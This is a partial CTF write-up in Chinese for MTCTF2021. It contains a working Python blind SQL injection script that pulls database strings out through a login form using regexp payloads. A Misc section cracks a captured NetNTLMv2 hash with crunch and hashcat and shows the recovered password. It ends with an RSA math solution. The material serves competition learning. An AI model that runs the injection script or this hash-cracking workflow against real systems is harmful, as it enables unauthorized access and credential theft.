MTCTF2021 部分WriteUp

import requests
import time
def str2int(mystr):
    i = 0   
    myint = 0    
    while (i < len(mystr)):  
        myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)        
        i += 1    
    return myint
sess = requests.Session()
url = ' 
f = '账号或密码错误'  # 错误时网页包含内容
y = 'flag is not here'  # 正确时网页包含内容
start = 0  # 字符串的开始字符位置
strlen = 80  # 待爆破字符串的长度
sleep_time = 0
ostr = '^'
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find='(select flag from flag)' # 想查询的字符串、语句；可能需要外加括号
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start+strlen):
    for i in range(32, 127):  # 可见字符范围        
    # for i in range(95,127):#可见字符范围        
    if i == 46 or i == 42 or i == 43 or i == 63 or i==94:  # 略过一些特殊符号（$ . * ? ^等）  
       continue        
    time.sleep(sleep_time)        
    # regexp binary 0x5e61;        
    temp_str = ostr+chr(i)        
    ent = '{} regexp binary {}'.format(          
        str2find, hex(str2int(temp_str)))  # 待判断的事实语句        
    payload = "||{}#".format(ent)  # 注入语句       
    # print(payload)        
    # exit()        
    # data数据包的构造        
    data = {        
        'username': '\',            
        'password': payload.replace(' ', '/**/')        
    }        
    sess.get(url)        
    res = sess.post(url, data=data)        
    res.encoding = res.apparent_encoding  # 中文编码        
    text = res.text        
    if f in text:         
       continue        
    elif y in text:          
       ostr += chr(i)            
       print(ostr, j)            
       break        
    else:  # 即非正也非负的异常情况         
       print('error:', text)            
       break
print(ostr)

★Misc3

ntlvm2 请求流程
1.客户端向服务器发送一个请求，请求中包含明文的登录用户名。服务器会提前存储登录用户名和对应的密码hash
2.服务器接收到请求后，生成一个16位的随机数(这个随机数被称为Challenge),明文发送回客户端。使用存储的登录用户密码hash加密Challenge，获得Challenge1
3.客户端接收到Challenge后，使用登录用户的密码hash对Challenge加密，获得Challenge2(这个结果被称为response)，将response发送给服务器
4.服务器接收客户端加密后的response，比较Challenge1和response，如果相同，验证成功
NTLMv2的格式为：
username::domain:challenge:HMAC-MD5:blob
username: nanming
domain :MicrosoftAccount

challenge为NTLM Server Challenge，domian由数据包内容获得(IP或者机器名)
Challenge:6a99833ddd690e7a

HMAC-MD5对应数据包中的NTProofStr

NTProofStr:
980a5dc38aaff466c367eff70bcf80cb
response:   010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000

根据数据包名可知密码为八位前4为pass，我们生成对应的密码
crunch 8 8 -t pass%%%% >> 1.txt
尝试破解

└─#  hashcat -m 5600  nanming::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000  /root/1.txt -o found.txt --force
-m 选择类型 5600    --force 强制执行
hashcat (v6.1.1) starting...
 
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Common KVM processor, 5844/5908 MB (2048 MB allocatable), 4MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 65 MB
 
Dictionary cache hit:
* Filename..: /root/1.txt
* Passwords.: 10001
* Bytes.....: 90008
* Keyspace..: 10001
 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc3...000000
Time.Started.....: Sun May 23 18:29:23 2021, (0 secs)
Time.Estimated...: Sun May 23 18:29:23 2021, (0 secs)
Guess.Base.......: File (/root/1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    42913 H/s (5.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/10001 (40.96%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/10001 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: pass0000 -> pass4094
 
Started: Sun May 23 18:29:20 2021
Stopped: Sun May 23 18:29:25 2021
 
┌──(root💀kali)-[~]
└─# cat found.txt
NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***9516bc2e90000000002001e00570049004e002d004f004d004b004100540046003300520047004a00470001001e00570049004e002d004f004d004b004100540046003300520047004a00470004001e00570049004e002d004f004d004b004100540046003300520047004a00470003001e00570049004e002d004f004d004b004100540046003300520047004a0047000700080042325524355ed6010600040002000000080030003000000000000000010000000020000011ac824d212777625c616fadbb6dd0dfaf35a8e4d93f7960ec1eac5592e7cfde0a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e00330031002e00370035000000000000000000:pass1952

import gmpy2
from libnum import *
n=int("0x9371c61a2b760109781f229d43c6f05***de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79",16)
e=3
c1=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1",16)
c2=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9b***8104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8",16)
a = 3
b = 3
c = c1-c2+1
det = gmpy2.iroot(b**2 - 4*a*c, 2)
#以上操作结果
det = 419924980211305067664086451929469473556246023638897570322178499116255792376077397263806409834463657927723353414807
solu = (det - b)//(2*a)
print(n2s(solu))